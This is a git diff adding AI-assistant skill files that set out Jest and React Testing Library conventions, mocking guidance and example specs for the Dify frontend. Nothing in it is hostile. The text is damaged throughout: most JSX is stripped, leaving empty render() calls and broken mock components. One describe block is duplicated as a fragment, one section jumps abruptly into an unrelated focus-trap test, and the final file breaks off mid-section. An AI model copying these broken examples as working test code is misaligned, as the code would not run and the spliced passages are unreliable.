diff --git a/.claude/skills/frontend-testing/SKILL.md b/.claude/skills/frontend-testing/SKILL.md new file mode 100644 index 0000000000..cd775007a0 --- /dev/null +++ b/.claude/skills/frontend-testing/SKILL.md @@ -0,0 +1,322 @@ +--- +name: frontend-testing +description: Generate Jest + React Testing Library tests for Dify frontend components, hooks, and utilities. Triggers on testing, spec files, coverage, Jest, RTL, unit tests, integration tests, or write/review test requests. +--- + +# Dify Frontend Testing Skill + +This skill enables Claude to generate high-quality, comprehensive frontend tests for the Dify project following established conventions and best practices. + +> **⚠️ Authoritative Source**: This skill is derived from `web/testing/testing.md`. When in doubt, always refer to that document as the canonical specification. + +## When to Apply This Skill + +Apply this skill when the user: + +- Asks to **write tests** for a component, hook, or utility +- Asks to **review existing tests** for completeness +- Mentions **Jest**, **React Testing Library**, **RTL**, or **spec files** +- Requests **test coverage** improvement +- Uses `pnpm analyze-component` output as context +- Mentions **testing**, **unit tests**, or **integration tests** for frontend code +- Wants to understand **testing patterns** in the Dify codebase + +**Do NOT apply** when: + +- User is asking about backend/API tests (Python/pytest) +- User is asking about E2E tests (Playwright/Cypress) +- User is only asking conceptual questions without code context + +## Quick Reference + +### Tech Stack + +| Tool | Version | Purpose | +|------|---------|---------| +| Jest | 29.7 | Test runner | +| React Testing Library | 16.0 | Component testing | +| happy-dom | - | Test environment | +| nock | 14.0 | HTTP mocking | +| TypeScript | 5.x | Type safety | + +### Key Commands + +```bash +# Run all tests +pnpm test + +# Watch mode +pnpm test -- --watch + +# Run specific file +pnpm test -- path/to/file.spec.tsx + +# Generate coverage report +pnpm test -- --coverage + +# Analyze component complexity +pnpm analyze-component + +# Review existing test +pnpm analyze-component --review +``` + +### File Naming + +- Test files: `ComponentName.spec.tsx` (same directory as component) +- Integration tests: `web/__tests__/` directory + +## Test Structure Template + +```typescript +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import Component from './index' + +// ✅ Import real project components (DO NOT mock these) +// import Loading from '@/app/components/base/loading' +// import { ChildComponent } from './child-component' + +// ✅ Mock external dependencies only +jest.mock('@/service/api') +jest.mock('next/navigation', () => ({ + useRouter: () => ({ push: jest.fn() }), + usePathname: () => '/test', +})) + +// Shared state for mocks (if needed) +let mockSharedState = false + +describe('ComponentName', () => { + beforeEach(() => { + jest.clearAllMocks() // ✅ Reset mocks BEFORE each test + mockSharedState = false // ✅ Reset shared state + }) + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render without crashing', () => { + // Arrange + const props = { title: 'Test' } + + // Act + render() + + // Assert + expect(screen.getByText('Test')).toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should apply custom className', () => { + render() + expect(screen.getByRole('button')).toHaveClass('custom') + }) + }) + + // User Interactions + describe('User 
Interactions + describe('User 
Interactions', () => { + it('should handle click events', () => { + const handleClick = jest.fn() + render() + + fireEvent.click(screen.getByRole('button')) + + expect(handleClick).toHaveBeenCalledTimes(1) + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle null data', () => { + render() + expect(screen.getByText(/no data/i)).toBeInTheDocument() + }) + + it('should handle empty array', () => { + render() + expect(screen.getByText(/empty/i)).toBeInTheDocument() + }) + }) +}) +``` + +## Testing Workflow (CRITICAL) + +### ⚠️ Incremental Approach Required + +**NEVER generate all test files at once.** For complex components or multi-file directories: + +1. **Analyze & Plan**: List all files, order by complexity (simple → complex) +1. **Process ONE at a time**: Write test → Run test → Fix if needed → Next +1. **Verify before proceeding**: Do NOT continue to next file until current passes + +``` +For each file: + ┌────────────────────────────────────────┐ + │ 1. Write test │ + │ 2. Run: pnpm test -- .spec.tsx │ + │ 3. PASS? → Mark complete, next file │ + │ FAIL? → Fix first, then continue │ + └────────────────────────────────────────┘ +``` + +### Complexity-Based Order + +Process in this order for multi-file testing: + +1. 🟢 Utility functions (simplest) +1. 🟢 Custom hooks +1. 🟡 Simple components (presentational) +1. 🟡 Medium components (state, effects) +1. 🔴 Complex components (API, routing) +1. 🔴 Integration tests (index files - last) + +### When to Refactor First + +- **Complexity > 50**: Break into smaller pieces before testing +- **500+ lines**: Consider splitting before testing +- **Many dependencies**: Extract logic into hooks first + +> 📖 See `references/workflow.md` for complete workflow details and todo list format. + +## Testing Strategy + +### Path-Level Testing (Directory Testing) + +When assigned to test a directory/path, test **ALL content** within that path: + +- Test all components, hooks, utilities in the directory (not just `index` file) +- Use incremental approach: one file at a time, verify each before proceeding +- Goal: 100% coverage of ALL files in the directory + +### Integration Testing First + +**Prefer integration testing** when writing tests for a directory: + +- ✅ **Import real project components** directly (including base components and siblings) +- ✅ **Only mock**: API services (`@/service/*`), `next/navigation`, complex context providers +- ❌ **DO NOT mock** base components (`@/app/components/base/*`) +- ❌ **DO NOT mock** sibling/child components in the same directory + +> See [Test Structure Template](#test-structure-template) for correct import/mock patterns. + +## Core Principles + +### 1. AAA Pattern (Arrange-Act-Assert) + +Every test should clearly separate: + +- **Arrange**: Setup test data and render component +- **Act**: Perform user actions +- **Assert**: Verify expected outcomes + +### 2. Black-Box Testing + +- Test observable behavior, not implementation details +- Use semantic queries (getByRole, getByLabelText) +- Avoid testing internal state directly +- **Prefer pattern matching over hardcoded strings** in assertions: + +```typescript +// ❌ Avoid: hardcoded text assertions +expect(screen.getByText('Loading...')).toBeInTheDocument() + +// ✅ Better: role-based queries +expect(screen.getByRole('status')).toBeInTheDocument() + +// ✅ Better: pattern matching +expect(screen.getByText(/loading/i)).toBeInTheDocument() +``` + +### 3. 
Single Behavior Per Test + +Each test verifies ONE user-observable behavior: + +```typescript +// ✅ Good: One behavior +it('should disable button when loading', () => { + render( + + + ) + + // Focus should cycle within modal + await user.tab() + expect(screen.getByText('First')).toHaveFocus() + + await user.tab() + expect(screen.getByText('Second')).toHaveFocus() + + await user.tab() + expect(screen.getByText('First')).toHaveFocus() // Cycles back + }) +}) +``` + +## Form Testing + +```typescript +describe('LoginForm', () => { + it('should submit valid form', async () => { + const user = userEvent.setup() + const onSubmit = jest.fn() + + render() + + await user.type(screen.getByLabelText(/email/i), 'test@example.com') + await user.type(screen.getByLabelText(/password/i), 'password123') + await user.click(screen.getByRole('button', { name: /sign in/i })) + + expect(onSubmit).toHaveBeenCalledWith({ + email: 'test@example.com', + password: 'password123', + }) + }) + + it('should show validation errors', async () => { + const user = userEvent.setup() + + render() + + // Submit empty form + await user.click(screen.getByRole('button', { name: /sign in/i })) + + expect(screen.getByText(/email is required/i)).toBeInTheDocument() + expect(screen.getByText(/password is required/i)).toBeInTheDocument() + }) + + it('should validate email format', async () => { + const user = userEvent.setup() + + render() + + await user.type(screen.getByLabelText(/email/i), 'invalid-email') + await user.click(screen.getByRole('button', { name: /sign in/i })) + + expect(screen.getByText(/invalid email/i)).toBeInTheDocument() + }) + + it('should disable submit button while submitting', async () => { + const user = userEvent.setup() + const onSubmit = jest.fn(() => new Promise(resolve => setTimeout(resolve, 100))) + + render() + + await user.type(screen.getByLabelText(/email/i), 'test@example.com') + await user.type(screen.getByLabelText(/password/i), 'password123') + await user.click(screen.getByRole('button', { name: /sign in/i })) + + expect(screen.getByRole('button', { name: /signing in/i })).toBeDisabled() + + await waitFor(() => { + expect(screen.getByRole('button', { name: /sign in/i })).toBeEnabled() + }) + }) +}) +``` + +## Data-Driven Tests with test.each + +```typescript +describe('StatusBadge', () => { + test.each([ + ['success', 'bg-green-500'], + ['warning', 'bg-yellow-500'], + ['error', 'bg-red-500'], + ['info', 'bg-blue-500'], + ])('should apply correct class for %s status', (status, expectedClass) => { + render() + + expect(screen.getByTestId('status-badge')).toHaveClass(expectedClass) + }) + + test.each([ + { input: null, expected: 'Unknown' }, + { input: undefined, expected: 'Unknown' }, + { input: '', expected: 'Unknown' }, + { input: 'invalid', expected: 'Unknown' }, + ])('should show "Unknown" for invalid input: $input', ({ input, expected }) => { + render() + + expect(screen.getByText(expected)).toBeInTheDocument() + }) +}) +``` + +## Debugging Tips + +```typescript +// Print entire DOM +screen.debug() + +// Print specific element +screen.debug(screen.getByRole('button')) + +// Log testing playground URL +screen.logTestingPlaygroundURL() + +// Pretty print DOM +import { prettyDOM } from '@testing-library/react' +console.log(prettyDOM(screen.getByRole('dialog'))) + +// Check available roles +import { getRoles } from '@testing-library/react' +console.log(getRoles(container)) +``` + +## Common Mistakes to Avoid + +### ❌ Don't Use Implementation Details + +```typescript +// Bad - testing 
implementation +expect(component.state.isOpen).toBe(true) +expect(wrapper.find('.internal-class').length).toBe(1) + +// Good - testing behavior +expect(screen.getByRole('dialog')).toBeInTheDocument() +``` + +### ❌ Don't Forget Cleanup + +```typescript +// Bad - may leak state between tests +it('test 1', () => { + render() +}) + +// Good - cleanup is automatic with RTL, but reset mocks +beforeEach(() => { + jest.clearAllMocks() +}) +``` + +### ❌ Don't Use Exact String Matching (Prefer Black-Box Assertions) + +```typescript +// ❌ Bad - hardcoded strings are brittle +expect(screen.getByText('Submit Form')).toBeInTheDocument() +expect(screen.getByText('Loading...')).toBeInTheDocument() + +// ✅ Good - role-based queries (most semantic) +expect(screen.getByRole('button', { name: /submit/i })).toBeInTheDocument() +expect(screen.getByRole('status')).toBeInTheDocument() + +// ✅ Good - pattern matching (flexible) +expect(screen.getByText(/submit/i)).toBeInTheDocument() +expect(screen.getByText(/loading/i)).toBeInTheDocument() + +// ✅ Good - test behavior, not exact UI text +expect(screen.getByRole('button')).toBeDisabled() +expect(screen.getByRole('alert')).toBeInTheDocument() +``` + +**Why prefer black-box assertions?** + +- Text content may change (i18n, copy updates) +- Role-based queries test accessibility +- Pattern matching is resilient to minor changes +- Tests focus on behavior, not implementation details + +### ❌ Don't Assert on Absence Without Query + +```typescript +// Bad - throws if not found +expect(screen.getByText('Error')).not.toBeInTheDocument() // Error! + +// Good - use queryBy for absence assertions +expect(screen.queryByText('Error')).not.toBeInTheDocument() +``` diff --git a/.claude/skills/frontend-testing/references/domain-components.md b/.claude/skills/frontend-testing/references/domain-components.md new file mode 100644 index 0000000000..ed2cc6eb8a --- /dev/null +++ b/.claude/skills/frontend-testing/references/domain-components.md @@ -0,0 +1,523 @@ +# Domain-Specific Component Testing + +This guide covers testing patterns for Dify's domain-specific components. + +## Workflow Components (`workflow/`) + +Workflow components handle node configuration, data flow, and graph operations. + +### Key Test Areas + +1. **Node Configuration** +1. **Data Validation** +1. **Variable Passing** +1. **Edge Connections** +1. 
**Error Handling** + +### Example: Node Configuration Panel + +```typescript +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import NodeConfigPanel from './node-config-panel' +import { createMockNode, createMockWorkflowContext } from '@/__mocks__/workflow' + +// Mock workflow context +jest.mock('@/app/components/workflow/hooks', () => ({ + useWorkflowStore: () => mockWorkflowStore, + useNodesInteractions: () => mockNodesInteractions, +})) + +let mockWorkflowStore = { + nodes: [], + edges: [], + updateNode: jest.fn(), +} + +let mockNodesInteractions = { + handleNodeSelect: jest.fn(), + handleNodeDelete: jest.fn(), +} + +describe('NodeConfigPanel', () => { + beforeEach(() => { + jest.clearAllMocks() + mockWorkflowStore = { + nodes: [], + edges: [], + updateNode: jest.fn(), + } + }) + + describe('Node Configuration', () => { + it('should render node type selector', () => { + const node = createMockNode({ type: 'llm' }) + render() + + expect(screen.getByLabelText(/model/i)).toBeInTheDocument() + }) + + it('should update node config on change', async () => { + const user = userEvent.setup() + const node = createMockNode({ type: 'llm' }) + + render() + + await user.selectOptions(screen.getByLabelText(/model/i), 'gpt-4') + + expect(mockWorkflowStore.updateNode).toHaveBeenCalledWith( + node.id, + expect.objectContaining({ model: 'gpt-4' }) + ) + }) + }) + + describe('Data Validation', () => { + it('should show error for invalid input', async () => { + const user = userEvent.setup() + const node = createMockNode({ type: 'code' }) + + render() + + // Enter invalid code + const codeInput = screen.getByLabelText(/code/i) + await user.clear(codeInput) + await user.type(codeInput, 'invalid syntax {{{') + + await waitFor(() => { + expect(screen.getByText(/syntax error/i)).toBeInTheDocument() + }) + }) + + it('should validate required fields', async () => { + const node = createMockNode({ type: 'http', data: { url: '' } }) + + render() + + fireEvent.click(screen.getByRole('button', { name: /save/i })) + + await waitFor(() => { + expect(screen.getByText(/url is required/i)).toBeInTheDocument() + }) + }) + }) + + describe('Variable Passing', () => { + it('should display available variables from upstream nodes', () => { + const upstreamNode = createMockNode({ + id: 'node-1', + type: 'start', + data: { outputs: [{ name: 'user_input', type: 'string' }] }, + }) + const currentNode = createMockNode({ + id: 'node-2', + type: 'llm', + }) + + mockWorkflowStore.nodes = [upstreamNode, currentNode] + mockWorkflowStore.edges = [{ source: 'node-1', target: 'node-2' }] + + render() + + // Variable selector should show upstream variables + fireEvent.click(screen.getByRole('button', { name: /add variable/i })) + + expect(screen.getByText('user_input')).toBeInTheDocument() + }) + + it('should insert variable into prompt template', async () => { + const user = userEvent.setup() + const node = createMockNode({ type: 'llm' }) + + render() + + // Click variable button + await user.click(screen.getByRole('button', { name: /insert variable/i })) + await user.click(screen.getByText('user_input')) + + const promptInput = screen.getByLabelText(/prompt/i) + expect(promptInput).toHaveValue(expect.stringContaining('{{user_input}}')) + }) + }) +}) +``` + +## Dataset Components (`dataset/`) + +Dataset components handle file uploads, data display, and search/filter operations. + +### Key Test Areas + +1. **File Upload** +1. **File Type Validation** +1. 
**Pagination** +1. **Search & Filtering** +1. **Data Format Handling** + +### Example: Document Uploader + +```typescript +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import DocumentUploader from './document-uploader' + +jest.mock('@/service/datasets', () => ({ + uploadDocument: jest.fn(), + parseDocument: jest.fn(), +})) + +import * as datasetService from '@/service/datasets' +const mockedService = datasetService as jest.Mocked + +describe('DocumentUploader', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('File Upload', () => { + it('should accept valid file types', async () => { + const user = userEvent.setup() + const onUpload = jest.fn() + mockedService.uploadDocument.mockResolvedValue({ id: 'doc-1' }) + + render() + + const file = new File(['content'], 'test.pdf', { type: 'application/pdf' }) + const input = screen.getByLabelText(/upload/i) + + await user.upload(input, file) + + await waitFor(() => { + expect(mockedService.uploadDocument).toHaveBeenCalledWith( + expect.any(FormData) + ) + }) + }) + + it('should reject invalid file types', async () => { + const user = userEvent.setup() + + render() + + const file = new File(['content'], 'test.exe', { type: 'application/x-msdownload' }) + const input = screen.getByLabelText(/upload/i) + + await user.upload(input, file) + + expect(screen.getByText(/unsupported file type/i)).toBeInTheDocument() + expect(mockedService.uploadDocument).not.toHaveBeenCalled() + }) + + it('should show upload progress', async () => { + const user = userEvent.setup() + + // Mock upload with progress + mockedService.uploadDocument.mockImplementation(() => { + return new Promise((resolve) => { + setTimeout(() => resolve({ id: 'doc-1' }), 100) + }) + }) + + render() + + const file = new File(['content'], 'test.pdf', { type: 'application/pdf' }) + await user.upload(screen.getByLabelText(/upload/i), file) + + expect(screen.getByRole('progressbar')).toBeInTheDocument() + + await waitFor(() => { + expect(screen.queryByRole('progressbar')).not.toBeInTheDocument() + }) + }) + }) + + describe('Error Handling', () => { + it('should handle upload failure', async () => { + const user = userEvent.setup() + mockedService.uploadDocument.mockRejectedValue(new Error('Upload failed')) + + render() + + const file = new File(['content'], 'test.pdf', { type: 'application/pdf' }) + await user.upload(screen.getByLabelText(/upload/i), file) + + await waitFor(() => { + expect(screen.getByText(/upload failed/i)).toBeInTheDocument() + }) + }) + + it('should allow retry after failure', async () => { + const user = userEvent.setup() + mockedService.uploadDocument + .mockRejectedValueOnce(new Error('Network error')) + .mockResolvedValueOnce({ id: 'doc-1' }) + + render() + + const file = new File(['content'], 'test.pdf', { type: 'application/pdf' }) + await user.upload(screen.getByLabelText(/upload/i), file) + + await waitFor(() => { + expect(screen.getByRole('button', { name: /retry/i })).toBeInTheDocument() + }) + + await user.click(screen.getByRole('button', { name: /retry/i })) + + await waitFor(() => { + expect(screen.getByText(/uploaded successfully/i)).toBeInTheDocument() + }) + }) + }) +}) +``` + +### Example: Document List with Pagination + +```typescript +describe('DocumentList', () => { + describe('Pagination', () => { + it('should load first page on mount', async () => { + mockedService.getDocuments.mockResolvedValue({ + data: [{ id: '1', name: 'Doc 1' }], + total: 50, + 
page: 1, + pageSize: 10, + }) + + render() + + await waitFor(() => { + expect(screen.getByText('Doc 1')).toBeInTheDocument() + }) + + expect(mockedService.getDocuments).toHaveBeenCalledWith('ds-1', { page: 1 }) + }) + + it('should navigate to next page', async () => { + const user = userEvent.setup() + mockedService.getDocuments.mockResolvedValue({ + data: [{ id: '1', name: 'Doc 1' }], + total: 50, + page: 1, + pageSize: 10, + }) + + render() + + await waitFor(() => { + expect(screen.getByText('Doc 1')).toBeInTheDocument() + }) + + mockedService.getDocuments.mockResolvedValue({ + data: [{ id: '11', name: 'Doc 11' }], + total: 50, + page: 2, + pageSize: 10, + }) + + await user.click(screen.getByRole('button', { name: /next/i })) + + await waitFor(() => { + expect(screen.getByText('Doc 11')).toBeInTheDocument() + }) + }) + }) + + describe('Search & Filtering', () => { + it('should filter by search query', async () => { + const user = userEvent.setup() + jest.useFakeTimers() + + render() + + await user.type(screen.getByPlaceholderText(/search/i), 'test query') + + // Debounce + jest.advanceTimersByTime(300) + + await waitFor(() => { + expect(mockedService.getDocuments).toHaveBeenCalledWith( + 'ds-1', + expect.objectContaining({ search: 'test query' }) + ) + }) + + jest.useRealTimers() + }) + }) +}) +``` + +## Configuration Components (`app/configuration/`, `config/`) + +Configuration components handle forms, validation, and data persistence. + +### Key Test Areas + +1. **Form Validation** +1. **Save/Reset** +1. **Required vs Optional Fields** +1. **Configuration Persistence** +1. **Error Feedback** + +### Example: App Configuration Form + +```typescript +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import AppConfigForm from './app-config-form' + +jest.mock('@/service/apps', () => ({ + updateAppConfig: jest.fn(), + getAppConfig: jest.fn(), +})) + +import * as appService from '@/service/apps' +const mockedService = appService as jest.Mocked + +describe('AppConfigForm', () => { + const defaultConfig = { + name: 'My App', + description: '', + icon: 'default', + openingStatement: '', + } + + beforeEach(() => { + jest.clearAllMocks() + mockedService.getAppConfig.mockResolvedValue(defaultConfig) + }) + + describe('Form Validation', () => { + it('should require app name', async () => { + const user = userEvent.setup() + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + // Clear name field + await user.clear(screen.getByLabelText(/name/i)) + await user.click(screen.getByRole('button', { name: /save/i })) + + expect(screen.getByText(/name is required/i)).toBeInTheDocument() + expect(mockedService.updateAppConfig).not.toHaveBeenCalled() + }) + + it('should validate name length', async () => { + const user = userEvent.setup() + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toBeInTheDocument() + }) + + // Enter very long name + await user.clear(screen.getByLabelText(/name/i)) + await user.type(screen.getByLabelText(/name/i), 'a'.repeat(101)) + + expect(screen.getByText(/name must be less than 100 characters/i)).toBeInTheDocument() + }) + + it('should allow empty optional fields', async () => { + const user = userEvent.setup() + mockedService.updateAppConfig.mockResolvedValue({ success: true }) + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + // Leave description empty 
(optional) + await user.click(screen.getByRole('button', { name: /save/i })) + + await waitFor(() => { + expect(mockedService.updateAppConfig).toHaveBeenCalled() + }) + }) + }) + + describe('Save/Reset Functionality', () => { + it('should save configuration', async () => { + const user = userEvent.setup() + mockedService.updateAppConfig.mockResolvedValue({ success: true }) + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + await user.clear(screen.getByLabelText(/name/i)) + await user.type(screen.getByLabelText(/name/i), 'Updated App') + await user.click(screen.getByRole('button', { name: /save/i })) + + await waitFor(() => { + expect(mockedService.updateAppConfig).toHaveBeenCalledWith( + 'app-1', + expect.objectContaining({ name: 'Updated App' }) + ) + }) + + expect(screen.getByText(/saved successfully/i)).toBeInTheDocument() + }) + + it('should reset to default values', async () => { + const user = userEvent.setup() + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + // Make changes + await user.clear(screen.getByLabelText(/name/i)) + await user.type(screen.getByLabelText(/name/i), 'Changed Name') + + // Reset + await user.click(screen.getByRole('button', { name: /reset/i })) + + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + it('should show unsaved changes warning', async () => { + const user = userEvent.setup() + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + // Make changes + await user.type(screen.getByLabelText(/name/i), ' Updated') + + expect(screen.getByText(/unsaved changes/i)).toBeInTheDocument() + }) + }) + + describe('Error Handling', () => { + it('should show error on save failure', async () => { + const user = userEvent.setup() + mockedService.updateAppConfig.mockRejectedValue(new Error('Server error')) + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + await user.click(screen.getByRole('button', { name: /save/i })) + + await waitFor(() => { + expect(screen.getByText(/failed to save/i)).toBeInTheDocument() + }) + }) + }) +}) +``` diff --git a/.claude/skills/frontend-testing/references/mocking.md b/.claude/skills/frontend-testing/references/mocking.md new file mode 100644 index 0000000000..bf0bd79690 --- /dev/null +++ b/.claude/skills/frontend-testing/references/mocking.md @@ -0,0 +1,363 @@ +# Mocking Guide for Dify Frontend Tests + +## ⚠️ Important: What NOT to Mock + +### DO NOT Mock Base Components + +**Never mock components from `@/app/components/base/`** such as: + +- `Loading`, `Spinner` +- `Button`, `Input`, `Select` +- `Tooltip`, `Modal`, `Dropdown` +- `Icon`, `Badge`, `Tag` + +**Why?** + +- Base components will have their own dedicated tests +- Mocking them creates false positives (tests pass but real integration fails) +- Using real components tests actual integration behavior + +```typescript +// ❌ WRONG: Don't mock base components +jest.mock('@/app/components/base/loading', () => () =>
<div>Loading</div>
) +jest.mock('@/app/components/base/button', () => ({ children }: any) => ) + +// ✅ CORRECT: Import and use real base components +import Loading from '@/app/components/base/loading' +import Button from '@/app/components/base/button' +// They will render normally in tests +``` + +### What TO Mock + +Only mock these categories: + +1. **API services** (`@/service/*`) - Network calls +1. **Complex context providers** - When setup is too difficult +1. **Third-party libraries with side effects** - `next/navigation`, external SDKs +1. **i18n** - Always mock to return keys + +## Mock Placement + +| Location | Purpose | +|----------|---------| +| `web/__mocks__/` | Reusable mocks shared across multiple test files | +| Test file | Test-specific mocks, inline with `jest.mock()` | + +## Essential Mocks + +### 1. i18n (Auto-loaded via Shared Mock) + +A shared mock is available at `web/__mocks__/react-i18next.ts` and is auto-loaded by Jest. +**No explicit mock needed** for most tests - it returns translation keys as-is. + +For tests requiring custom translations, override the mock: + +```typescript +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => { + const translations: Record = { + 'my.custom.key': 'Custom translation', + } + return translations[key] || key + }, + }), +})) +``` + +### 2. Next.js Router + +```typescript +const mockPush = jest.fn() +const mockReplace = jest.fn() + +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockPush, + replace: mockReplace, + back: jest.fn(), + prefetch: jest.fn(), + }), + usePathname: () => '/current-path', + useSearchParams: () => new URLSearchParams('?key=value'), +})) + +describe('Component', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + it('should navigate on click', () => { + render() + fireEvent.click(screen.getByRole('button')) + expect(mockPush).toHaveBeenCalledWith('/expected-path') + }) +}) +``` + +### 3. Portal Components (with Shared State) + +```typescript +// ⚠️ Important: Use shared state for components that depend on each other +let mockPortalOpenState = false + +jest.mock('@/app/components/base/portal-to-follow-elem', () => ({ + PortalToFollowElem: ({ children, open, ...props }: any) => { + mockPortalOpenState = open || false // Update shared state + return
<div {...props}>{children}</div>
+ }, + PortalToFollowElemContent: ({ children }: any) => { + // ✅ Matches actual: returns null when portal is closed + if (!mockPortalOpenState) return null + return
<div>{children}</div>
+ }, + PortalToFollowElemTrigger: ({ children }: any) => ( +
<div>{children}</div>
+ ), +})) + +describe('Component', () => { + beforeEach(() => { + jest.clearAllMocks() + mockPortalOpenState = false // ✅ Reset shared state + }) +}) +``` + +### 4. API Service Mocks + +```typescript +import * as api from '@/service/api' + +jest.mock('@/service/api') + +const mockedApi = api as jest.Mocked + +describe('Component', () => { + beforeEach(() => { + jest.clearAllMocks() + + // Setup default mock implementation + mockedApi.fetchData.mockResolvedValue({ data: [] }) + }) + + it('should show data on success', async () => { + mockedApi.fetchData.mockResolvedValue({ data: [{ id: 1 }] }) + + render() + + await waitFor(() => { + expect(screen.getByText('1')).toBeInTheDocument() + }) + }) + + it('should show error on failure', async () => { + mockedApi.fetchData.mockRejectedValue(new Error('Network error')) + + render() + + await waitFor(() => { + expect(screen.getByText(/error/i)).toBeInTheDocument() + }) + }) +}) +``` + +### 5. HTTP Mocking with Nock + +```typescript +import nock from 'nock' + +const GITHUB_HOST = 'https://api.github.com' +const GITHUB_PATH = '/repos/owner/repo' + +const mockGithubApi = (status: number, body: Record, delayMs = 0) => { + return nock(GITHUB_HOST) + .get(GITHUB_PATH) + .delay(delayMs) + .reply(status, body) +} + +describe('GithubComponent', () => { + afterEach(() => { + nock.cleanAll() + }) + + it('should display repo info', async () => { + mockGithubApi(200, { name: 'dify', stars: 1000 }) + + render() + + await waitFor(() => { + expect(screen.getByText('dify')).toBeInTheDocument() + }) + }) + + it('should handle API error', async () => { + mockGithubApi(500, { message: 'Server error' }) + + render() + + await waitFor(() => { + expect(screen.getByText(/error/i)).toBeInTheDocument() + }) + }) +}) +``` + +### 6. Context Providers + +```typescript +import { ProviderContext } from '@/context/provider-context' +import { createMockProviderContextValue, createMockPlan } from '@/__mocks__/provider-context' + +describe('Component with Context', () => { + it('should render for free plan', () => { + const mockContext = createMockPlan('sandbox') + + render( + + + + ) + + expect(screen.getByText('Upgrade')).toBeInTheDocument() + }) + + it('should render for pro plan', () => { + const mockContext = createMockPlan('professional') + + render( + + + + ) + + expect(screen.queryByText('Upgrade')).not.toBeInTheDocument() + }) +}) +``` + +### 7. SWR / React Query + +```typescript +// SWR +jest.mock('swr', () => ({ + __esModule: true, + default: jest.fn(), +})) + +import useSWR from 'swr' +const mockedUseSWR = useSWR as jest.Mock + +describe('Component with SWR', () => { + it('should show loading state', () => { + mockedUseSWR.mockReturnValue({ + data: undefined, + error: undefined, + isLoading: true, + }) + + render() + expect(screen.getByText(/loading/i)).toBeInTheDocument() + }) +}) + +// React Query +import { QueryClient, QueryClientProvider } from '@tanstack/react-query' + +const createTestQueryClient = () => new QueryClient({ + defaultOptions: { + queries: { retry: false }, + mutations: { retry: false }, + }, +}) + +const renderWithQueryClient = (ui: React.ReactElement) => { + const queryClient = createTestQueryClient() + return render( + + {ui} + + ) +} +``` + +## Mock Best Practices + +### ✅ DO + +1. **Use real base components** - Import from `@/app/components/base/` directly +1. **Use real project components** - Prefer importing over mocking +1. **Reset mocks in `beforeEach`**, not `afterEach` +1. 
**Match actual component behavior** in mocks (when mocking is necessary) +1. **Use factory functions** for complex mock data +1. **Import actual types** for type safety +1. **Reset shared mock state** in `beforeEach` + +### ❌ DON'T + +1. **Don't mock base components** (`Loading`, `Button`, `Tooltip`, etc.) +1. Don't mock components you can import directly +1. Don't create overly simplified mocks that miss conditional logic +1. Don't forget to clean up nock after each test +1. Don't use `any` types in mocks without necessity + +### Mock Decision Tree + +``` +Need to use a component in test? +│ +├─ Is it from @/app/components/base/*? +│ └─ YES → Import real component, DO NOT mock +│ +├─ Is it a project component? +│ └─ YES → Prefer importing real component +│ Only mock if setup is extremely complex +│ +├─ Is it an API service (@/service/*)? +│ └─ YES → Mock it +│ +├─ Is it a third-party lib with side effects? +│ └─ YES → Mock it (next/navigation, external SDKs) +│ +└─ Is it i18n? + └─ YES → Uses shared mock (auto-loaded). Override only for custom translations +``` + +## Factory Function Pattern + +```typescript +// __mocks__/data-factories.ts +import type { User, Project } from '@/types' + +export const createMockUser = (overrides: Partial = {}): User => ({ + id: 'user-1', + name: 'Test User', + email: 'test@example.com', + role: 'member', + createdAt: new Date().toISOString(), + ...overrides, +}) + +export const createMockProject = (overrides: Partial = {}): Project => ({ + id: 'project-1', + name: 'Test Project', + description: 'A test project', + owner: createMockUser(), + members: [], + createdAt: new Date().toISOString(), + ...overrides, +}) + +// Usage in tests +it('should display project owner', () => { + const project = createMockProject({ + owner: createMockUser({ name: 'John Doe' }), + }) + + render() + expect(screen.getByText('John Doe')).toBeInTheDocument() +}) +``` diff --git a/.claude/skills/frontend-testing/references/workflow.md b/.claude/skills/frontend-testing/references/workflow.md new file mode 100644 index 0000000000..b0f2994bde --- /dev/null +++ b/.claude/skills/frontend-testing/references/workflow.md @@ -0,0 +1,269 @@ +# Testing Workflow Guide + +This guide defines the workflow for generating tests, especially for complex components or directories with multiple files. + +## Scope Clarification + +This guide addresses **multi-file workflow** (how to process multiple test files). For coverage requirements within a single test file, see `web/testing/testing.md` § Coverage Goals. + +| Scope | Rule | +|-------|------| +| **Single file** | Complete coverage in one generation (100% function, >95% branch) | +| **Multi-file directory** | Process one file at a time, verify each before proceeding | + +## ⚠️ Critical Rule: Incremental Approach for Multi-File Testing + +When testing a **directory with multiple files**, **NEVER generate all test files at once.** Use an incremental, verify-as-you-go approach. + +### Why Incremental? 
